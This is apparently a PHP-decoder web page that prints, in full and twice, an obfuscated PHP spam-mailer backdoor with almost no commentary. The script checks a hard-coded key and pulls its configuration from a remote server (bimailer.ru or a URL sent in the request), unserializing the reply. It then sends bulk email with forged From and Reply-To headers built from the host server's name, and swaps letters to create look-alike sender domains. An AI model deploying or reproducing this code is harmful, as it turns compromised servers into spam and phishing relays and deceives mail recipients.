Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ini_set(_1891442855(0),_1891442855(1));ini_set(_1891442855(2),_1891442855(3));error_..

Decoded Output download

<?php ini_set(_1891442855(0),_1891442855(1));ini_set(_1891442855(2),_1891442855(3));error_reporting(1);$key=_1891442855(4);if(empty($_GET)&& empty($_POST)){exit(file_get_contents(_1891442855(5)));}if(isset($_GET[_1891442855(6)])){exit(_1891442855(7));}if($_POST[_1891442855(8)]!==$key){exit(_1891442855(9));}$EQ=_1891442855(10);ini_set(_1891442855(11),_1891442855(12));ini_set(_1891442855(13),_1891442855(14));ini_set(_1891442855(15),E_ALL);function strs($s){return substr($s,(strrpos($s,_1891442855(16))+1));}function overwrite($val,$dkim=false){$val=str_replace(array_keys($_POST),array_values($_POST),base64_decode($val));$dom=str_replace(_1891442855(17),_1891442855(18),$_SERVER[_1891442855(19)]);preg_match_all(_1891442855(20),$val,$arr);$func=strs($s);foreach($arr[1]as $v){$ar=explode(_1891442855(21),$v);$ars=array_map($func,$ar);$t=($dkim==1 && in_array($dom,$ars))?array_search($dom,$ars):rand(0,count($ar)-1);$val=str_replace(_1891442855(22) .$v ._1891442855(23),$ar[$t],$val);}return $val;}session_id($_POST[_1891442855(24)]);session_start(array(_1891442855(25)=>3600,_1891442855(26)=>0,_1891442855(27)=>1,_1891442855(28)=>1));if(empty($_SESSION[_1891442855(29)])or $_SESSION[_1891442855(30)]!==$_POST[_1891442855(31)]){session_unset();$params=array(_1891442855(32)=> array(_1891442855(33)=> _1891442855(34),_1891442855(35)=> 1,_1891442855(36)=> 15,_1891442855(37)=> 15,_1891442855(38)=> _1891442855(39) .$_SERVER[_1891442855(40)] ._1891442855(41),_1891442855(42)=> http_build_query(array(_1891442855(43)=>$_POST[_1891442855(44)],_1891442855(45)=>@$_POST[_1891442855(46)]))),_1891442855(47)=> array(_1891442855(48)=>false,_1891442855(49)=> false,_1891442855(50)=>true));$ctx=stream_context_create($params);$fp=fopen($_POST[_1891442855(51)],_1891442855(52),false,$ctx);if(!$response=stream_get_contents($fp)){exit(_1891442855(53) .$_POST[_1891442855(54)] ._1891442855(55));}if(!$_SESSION=unserialize($response)){exit($response);}}unset($_POST[_1891442855(56)],$_POST[_1891442855(57)],$_POST[_1891442855(58)],$_POST[_1891442855(59)],$_POST[_1891442855(60)]);$nt=rand(0,count($_SESSION[_1891442855(61)])-1);$nm=rand(0,count($_SESSION[_1891442855(62)])-1);$pref=array(_1891442855(63)=> _1891442855(64),_1891442855(65)=> $_SESSION[_1891442855(66)],_1891442855(67)=> 996,_1891442855(68)=> $EQ,_1891442855(69)=>$_SESSION[_1891442855(70)]== _1891442855(71)?_1891442855(72):_1891442855(73));$img=NULL;$_POST[_1891442855(74)]=htmlspecialchars(base64_decode($_POST[_1891442855(75)]),ENT_QUOTES);$_POST[_1891442855(76)]=htmlspecialchars(base64_decode($_POST[_1891442855(77)]),ENT_QUOTES);$_POST[_1891442855(78)]=htmlspecialchars(base64_decode($_POST[_1891442855(79)]),ENT_QUOTES);if(isset($_SESSION[_1891442855(80)])){$_POST=$_POST+$_SESSION[_1891442855(81)];}$to=$_SESSION[_1891442855(82)]== _1891442855(83)?str_replace(_1891442855(84),NULL,iconv_mime_encode(_1891442855(85),$_POST[_1891442855(86)],$pref)) ._1891442855(87) .$_POST[_1891442855(88)] ._1891442855(89):$_POST[_1891442855(90)];$theme=overwrite($_SESSION[_1891442855(91)][$nt]);$them=str_replace(_1891442855(92),NULL,iconv_mime_encode(_1891442855(93),$theme,$pref));$tB=iconv(_1891442855(94),$_SESSION[_1891442855(95)],overwrite($_SESSION[_1891442855(96)][$nm]));$tB=preg_replace(_1891442855(97),_1891442855(98),$tB);$names=overwrite($_SESSION[_1891442855(99)]);$mail=overwrite($_SESSION[_1891442855(100)],1);$mailotv=isset($_SESSION[_1891442855(101)])?overwrite($_SESSION[_1891442855(102)]):$mail;$bag=array(_1891442855(103),_1891442855(104),_1891442855(105),_1891442855(106),_1891442855(107),_1891442855(108));$googl=array(_1891442855(109),_1891442855(110),_1891442855(111),_1891442855(112),_1891442855(113),_1891442855(114));if(array_search(strstr($mail,_1891442855(115)),$bag)!==FALSE){if(strpos($vPost[_1891442855(116)],_1891442855(117))!==FALSE){$mail=str_replace(array(_1891442855(118),_1891442855(119),_1891442855(120),_1891442855(121),_1891442855(122),_1891442855(123),_1891442855(124),_1891442855(125),_1891442855(126)),array(_1891442855(127),_1891442855(128),_1891442855(129),_1891442855(130),_1891442855(131),_1891442855(132),_1891442855(133),_1891442855(134),_1891442855(135)),$mail);$mail=iconv(_1891442855(136),_1891442855(137),$mail);}else{$mail=str_replace($bag,$googl,$mail);}}$bn1=_1891442855(138) .strtoupper(md5(uniqid(rand(),true)));$head=iconv_mime_encode(_1891442855(139),$names,$pref) ._1891442855(140);if(strpos($_POST[_1891442855(141)],_1891442855(142))){$head .=stristr($mail,_1891442855(143),true) ._1891442855(144) .$_SERVER[_1891442855(145)] ._1891442855(146) .$EQ;}else{$head .=$mail ._1891442855(147) .$EQ;}$head .=iconv_mime_encode(_1891442855(148),$names,$pref) ._1891442855(149);if(strpos($_POST[_1891442855(150)],_1891442855(151))){$head .=stristr($mail,_1891442855(152),true) ._1891442855(153) .$_SERVER[_1891442855(154)] .">$EQ";}else{$head .=$mailotv .">$EQ";}$head .=strlen($_SESSION[_1891442855(155)])>5?overwrite($_SESSION[_1891442855(156)]) .$EQ:NULL;$head .= _1891442855(157) .$EQ;$head .="Content-Type:multipart/alternative;$EQ	boundary=\"$bn1\"$EQ";$mss=_1891442855(158) .$bn1 .$EQ;$mss .= _1891442855(159) .$_SESSION[_1891442855(160)] .$EQ;$mss .= _1891442855(161) .$_SESSION[_1891442855(162)] .$EQ .$EQ;$tB1=preg_replace(_1891442855(163),_1891442855(164),html_entity_decode(strip_tags($tB)));if($_SESSION[_1891442855(165)]== _1891442855(166)){$mss .=wordwrap($tB1,76,$EQ);}else{$mss .=$_SESSION[_1891442855(167)]== _1891442855(168)?wordwrap(quoted_printable_encode($tB1),76,$EQ):chunk_split(base64_encode($tB1),76,$EQ);}$mss .=$EQ .$EQ ._1891442855(169) .$bn1 .$EQ;$bn2=_1891442855(170) .strtoupper(md5(uniqid(rand(),true)));$mss.="Content-Type: multipart/related;$EQ	boundary=\"$bn2\"$EQ$EQ";$mss.= _1891442855(171) .$bn2 .$EQ;$mss.= _1891442855(172) .$_SESSION[_1891442855(173)] ."$EQ";$mss .= _1891442855(174) .$EQ;$mss .= _1891442855(175) .$_SESSION[_1891442855(176)] .$EQ .$EQ;if($_SESSION[_1891442855(177)]== _1891442855(178)){$mss .=wordwrap($tB,76,$EQ);}else{$mss .=$_SESSION[_1891442855(179)]== _1891442855(180)?wordwrap(quoted_printable_encode($tB),76,$EQ):chunk_split(base64_encode($tB),76,$EQ);}$mss .=$EQ;preg_match_all(_1891442855(181),$tB,$src);$fr=array_unique($src[1]);foreach($fr as $htp){$img .= _1891442855(182) .$bn2 .$EQ;$img .=$_SESSION[$htp] .$EQ;}if(!strpos($_POST[_1891442855(183)],_1891442855(184))){$mss .=$img;$mss.=empty($_SESSION[_1891442855(185)])?NULL:_1891442855(186) .$bn2 .$EQ .$_SESSION[_1891442855(187)] .$EQ;}$mss.=$EQ ._1891442855(188) .$bn2 ._1891442855(189) .$EQ .$EQ;$mss.= _1891442855(190) .$bn1 ._1891442855(191) .$EQ;if(mail($to,$them,$mss,$head)){$res=_1891442855(192);}else{$res=strripos(ini_get(_1891442855(193)),_1891442855(194))?_1891442855(195):_1891442855(196);}echo $res; function _1891442855($i){$a=array("display_errors","1","display_startup_errors","1",'0c6a4c1f751b6526eb9d4d4efe409e34','https://bimailer.ru/article.php','bisend','#bisend#','key','#0#',"
",'display_errors','1','display_startup_errors','1','error_reporting','@','www.','','SERVER_NAME','#[\{](.+?)[\}]#is',"|",'{','}','IS','gc_maxlifetime','use_cookies','gc_probability','gc_divisor','start','start','NS','http','method','POST','follow_location','max_redirects','timeout','header',"Content-type: application/x-www-form-urlencoded
Referer: ","HTTP_HOST","
",'content','key','key','post','post','ssl','verify_peer','verify_peer_name','allow_self_signed','give','rb','#4#','give','#4#','IS','NS','give','key','post','thems','mess','input-charset','UTF-8','output-charset','kodir','line-length','line-break-chars','scheme','sposob','quoted-printable','Q','B','%proj%','%proj%','%desc%','%desc%','%coms%','%coms%','zamena_img','zamena_img','bnm','1','To: ','To','%B%'," <",'%A%',">",'%A%','thems','Subject: ','Subject',"UTF-8",'kodir','mess',"/\>(\ |	|
|
)+\</",'> <','names','mail','mailotv','mailotv','@mail.ru','@yahoo.com','@bk.ru','@list.ru','@inbox.ru','@mail.ua','@meil.ru','@yanoo.com','@dk.ru','@llst.ru','@indox.ru','@meil.ua','@','%A%','@yahoo.com','a','e','o','y','k','c','x','p','t','','','','','','','','','','utf-8','windows-1251','------------','From'," <",'%A%','@mail-tester.com','@',"@",'HTTP_HOST','>','>','Reply-To',' <','%A%','@mail-tester.com','@',"@",'HTTP_HOST','headers','headers','MIME-Version: 1.0','--','Content-type: text/plain; charset=','kodir','Content-Transfer-Encoding:','sposob',"/\s{2,}/"," ",'sposob','8bit','sposob','quoted-printable','--',"------------",'--','Content-Type: text/html; charset=','kodir','Content-Disposition:inline;','Content-Transfer-Encoding:','sposob','sposob','8bit','sposob','quoted-printable','#<img.*?src=[\'|"]cid:image_(.+?)[\'|"]#is','--','%A%','@mail-tester.com','File','--','File','--','--','--','--','#1#',"disable_functions",'mail','#3#','#2#');return $a[$i];} ?>

Did this file decode correctly?

Original Code

<?php ini_set(_1891442855(0),_1891442855(1));ini_set(_1891442855(2),_1891442855(3));error_reporting(1);$key=_1891442855(4);if(empty($_GET)&& empty($_POST)){exit(file_get_contents(_1891442855(5)));}if(isset($_GET[_1891442855(6)])){exit(_1891442855(7));}if($_POST[_1891442855(8)]!==$key){exit(_1891442855(9));}$EQ=_1891442855(10);ini_set(_1891442855(11),_1891442855(12));ini_set(_1891442855(13),_1891442855(14));ini_set(_1891442855(15),E_ALL);function strs($s){return substr($s,(strrpos($s,_1891442855(16))+1));}function overwrite($val,$dkim=false){$val=str_replace(array_keys($_POST),array_values($_POST),base64_decode($val));$dom=str_replace(_1891442855(17),_1891442855(18),$_SERVER[_1891442855(19)]);preg_match_all(_1891442855(20),$val,$arr);$func=strs($s);foreach($arr[1]as $v){$ar=explode(_1891442855(21),$v);$ars=array_map($func,$ar);$t=($dkim==1 && in_array($dom,$ars))?array_search($dom,$ars):rand(0,count($ar)-1);$val=str_replace(_1891442855(22) .$v ._1891442855(23),$ar[$t],$val);}return $val;}session_id($_POST[_1891442855(24)]);session_start(array(_1891442855(25)=>3600,_1891442855(26)=>0,_1891442855(27)=>1,_1891442855(28)=>1));if(empty($_SESSION[_1891442855(29)])or $_SESSION[_1891442855(30)]!==$_POST[_1891442855(31)]){session_unset();$params=array(_1891442855(32)=> array(_1891442855(33)=> _1891442855(34),_1891442855(35)=> 1,_1891442855(36)=> 15,_1891442855(37)=> 15,_1891442855(38)=> _1891442855(39) .$_SERVER[_1891442855(40)] ._1891442855(41),_1891442855(42)=> http_build_query(array(_1891442855(43)=>$_POST[_1891442855(44)],_1891442855(45)=>@$_POST[_1891442855(46)]))),_1891442855(47)=> array(_1891442855(48)=>false,_1891442855(49)=> false,_1891442855(50)=>true));$ctx=stream_context_create($params);$fp=fopen($_POST[_1891442855(51)],_1891442855(52),false,$ctx);if(!$response=stream_get_contents($fp)){exit(_1891442855(53) .$_POST[_1891442855(54)] ._1891442855(55));}if(!$_SESSION=unserialize($response)){exit($response);}}unset($_POST[_1891442855(56)],$_POST[_1891442855(57)],$_POST[_1891442855(58)],$_POST[_1891442855(59)],$_POST[_1891442855(60)]);$nt=rand(0,count($_SESSION[_1891442855(61)])-1);$nm=rand(0,count($_SESSION[_1891442855(62)])-1);$pref=array(_1891442855(63)=> _1891442855(64),_1891442855(65)=> $_SESSION[_1891442855(66)],_1891442855(67)=> 996,_1891442855(68)=> $EQ,_1891442855(69)=>$_SESSION[_1891442855(70)]== _1891442855(71)?_1891442855(72):_1891442855(73));$img=NULL;$_POST[_1891442855(74)]=htmlspecialchars(base64_decode($_POST[_1891442855(75)]),ENT_QUOTES);$_POST[_1891442855(76)]=htmlspecialchars(base64_decode($_POST[_1891442855(77)]),ENT_QUOTES);$_POST[_1891442855(78)]=htmlspecialchars(base64_decode($_POST[_1891442855(79)]),ENT_QUOTES);if(isset($_SESSION[_1891442855(80)])){$_POST=$_POST+$_SESSION[_1891442855(81)];}$to=$_SESSION[_1891442855(82)]== _1891442855(83)?str_replace(_1891442855(84),NULL,iconv_mime_encode(_1891442855(85),$_POST[_1891442855(86)],$pref)) ._1891442855(87) .$_POST[_1891442855(88)] ._1891442855(89):$_POST[_1891442855(90)];$theme=overwrite($_SESSION[_1891442855(91)][$nt]);$them=str_replace(_1891442855(92),NULL,iconv_mime_encode(_1891442855(93),$theme,$pref));$tB=iconv(_1891442855(94),$_SESSION[_1891442855(95)],overwrite($_SESSION[_1891442855(96)][$nm]));$tB=preg_replace(_1891442855(97),_1891442855(98),$tB);$names=overwrite($_SESSION[_1891442855(99)]);$mail=overwrite($_SESSION[_1891442855(100)],1);$mailotv=isset($_SESSION[_1891442855(101)])?overwrite($_SESSION[_1891442855(102)]):$mail;$bag=array(_1891442855(103),_1891442855(104),_1891442855(105),_1891442855(106),_1891442855(107),_1891442855(108));$googl=array(_1891442855(109),_1891442855(110),_1891442855(111),_1891442855(112),_1891442855(113),_1891442855(114));if(array_search(strstr($mail,_1891442855(115)),$bag)!==FALSE){if(strpos($vPost[_1891442855(116)],_1891442855(117))!==FALSE){$mail=str_replace(array(_1891442855(118),_1891442855(119),_1891442855(120),_1891442855(121),_1891442855(122),_1891442855(123),_1891442855(124),_1891442855(125),_1891442855(126)),array(_1891442855(127),_1891442855(128),_1891442855(129),_1891442855(130),_1891442855(131),_1891442855(132),_1891442855(133),_1891442855(134),_1891442855(135)),$mail);$mail=iconv(_1891442855(136),_1891442855(137),$mail);}else{$mail=str_replace($bag,$googl,$mail);}}$bn1=_1891442855(138) .strtoupper(md5(uniqid(rand(),true)));$head=iconv_mime_encode(_1891442855(139),$names,$pref) ._1891442855(140);if(strpos($_POST[_1891442855(141)],_1891442855(142))){$head .=stristr($mail,_1891442855(143),true) ._1891442855(144) .$_SERVER[_1891442855(145)] ._1891442855(146) .$EQ;}else{$head .=$mail ._1891442855(147) .$EQ;}$head .=iconv_mime_encode(_1891442855(148),$names,$pref) ._1891442855(149);if(strpos($_POST[_1891442855(150)],_1891442855(151))){$head .=stristr($mail,_1891442855(152),true) ._1891442855(153) .$_SERVER[_1891442855(154)] .">$EQ";}else{$head .=$mailotv .">$EQ";}$head .=strlen($_SESSION[_1891442855(155)])>5?overwrite($_SESSION[_1891442855(156)]) .$EQ:NULL;$head .= _1891442855(157) .$EQ;$head .="Content-Type:multipart/alternative;$EQ	boundary=\"$bn1\"$EQ";$mss=_1891442855(158) .$bn1 .$EQ;$mss .= _1891442855(159) .$_SESSION[_1891442855(160)] .$EQ;$mss .= _1891442855(161) .$_SESSION[_1891442855(162)] .$EQ .$EQ;$tB1=preg_replace(_1891442855(163),_1891442855(164),html_entity_decode(strip_tags($tB)));if($_SESSION[_1891442855(165)]== _1891442855(166)){$mss .=wordwrap($tB1,76,$EQ);}else{$mss .=$_SESSION[_1891442855(167)]== _1891442855(168)?wordwrap(quoted_printable_encode($tB1),76,$EQ):chunk_split(base64_encode($tB1),76,$EQ);}$mss .=$EQ .$EQ ._1891442855(169) .$bn1 .$EQ;$bn2=_1891442855(170) .strtoupper(md5(uniqid(rand(),true)));$mss.="Content-Type: multipart/related;$EQ	boundary=\"$bn2\"$EQ$EQ";$mss.= _1891442855(171) .$bn2 .$EQ;$mss.= _1891442855(172) .$_SESSION[_1891442855(173)] ."$EQ";$mss .= _1891442855(174) .$EQ;$mss .= _1891442855(175) .$_SESSION[_1891442855(176)] .$EQ .$EQ;if($_SESSION[_1891442855(177)]== _1891442855(178)){$mss .=wordwrap($tB,76,$EQ);}else{$mss .=$_SESSION[_1891442855(179)]== _1891442855(180)?wordwrap(quoted_printable_encode($tB),76,$EQ):chunk_split(base64_encode($tB),76,$EQ);}$mss .=$EQ;preg_match_all(_1891442855(181),$tB,$src);$fr=array_unique($src[1]);foreach($fr as $htp){$img .= _1891442855(182) .$bn2 .$EQ;$img .=$_SESSION[$htp] .$EQ;}if(!strpos($_POST[_1891442855(183)],_1891442855(184))){$mss .=$img;$mss.=empty($_SESSION[_1891442855(185)])?NULL:_1891442855(186) .$bn2 .$EQ .$_SESSION[_1891442855(187)] .$EQ;}$mss.=$EQ ._1891442855(188) .$bn2 ._1891442855(189) .$EQ .$EQ;$mss.= _1891442855(190) .$bn1 ._1891442855(191) .$EQ;if(mail($to,$them,$mss,$head)){$res=_1891442855(192);}else{$res=strripos(ini_get(_1891442855(193)),_1891442855(194))?_1891442855(195):_1891442855(196);}echo $res; function _1891442855($i){$a=array("display_errors","1","display_startup_errors","1",'0c6a4c1f751b6526eb9d4d4efe409e34','https://bimailer.ru/article.php','bisend','#bisend#','key','#0#',"\n",'display_errors','1','display_startup_errors','1','error_reporting','@','www.','','SERVER_NAME','#[\{](.+?)[\}]#is',"|",'{','}','IS','gc_maxlifetime','use_cookies','gc_probability','gc_divisor','start','start','NS','http','method','POST','follow_location','max_redirects','timeout','header',"Content-type: application/x-www-form-urlencoded\r\nReferer: ","HTTP_HOST","\r\n",'content','key','key','post','post','ssl','verify_peer','verify_peer_name','allow_self_signed','give','rb','#4#','give','#4#','IS','NS','give','key','post','thems','mess','input-charset','UTF-8','output-charset','kodir','line-length','line-break-chars','scheme','sposob','quoted-printable','Q','B','%proj%','%proj%','%desc%','%desc%','%coms%','%coms%','zamena_img','zamena_img','bnm','1','To: ','To','%B%'," <",'%A%',">",'%A%','thems','Subject: ','Subject',"UTF-8",'kodir','mess',"/\>(\\x20|\t|\r|\n)+\</",'> <','names','mail','mailotv','mailotv','@mail.ru','@yahoo.com','@bk.ru','@list.ru','@inbox.ru','@mail.ua','@meil.ru','@yanoo.com','@dk.ru','@llst.ru','@indox.ru','@meil.ua','@','%A%','@yahoo.com','a','e','o','y','k','c','x','p','t','','','','','','','','','','utf-8','windows-1251','------------','From'," <",'%A%','@mail-tester.com','@',"@",'HTTP_HOST','>','>','Reply-To',' <','%A%','@mail-tester.com','@',"@",'HTTP_HOST','headers','headers','MIME-Version: 1.0','--','Content-type: text/plain; charset=','kodir','Content-Transfer-Encoding:','sposob',"/\s{2,}/"," ",'sposob','8bit','sposob','quoted-printable','--',"------------",'--','Content-Type: text/html; charset=','kodir','Content-Disposition:inline;','Content-Transfer-Encoding:','sposob','sposob','8bit','sposob','quoted-printable','#<img.*?src=[\'|"]cid:image_(.+?)[\'|"]#is','--','%A%','@mail-tester.com','File','--','File','--','--','--','--','#1#',"disable_functions",'mail','#3#','#2#');return $a[$i];}

Function Calls

_1891442855 1

Variables

None

Stats

MD5 804ba5d4ddfb378d68c789e7d8a8fca0
Eval Count 0
Decode Time 136 ms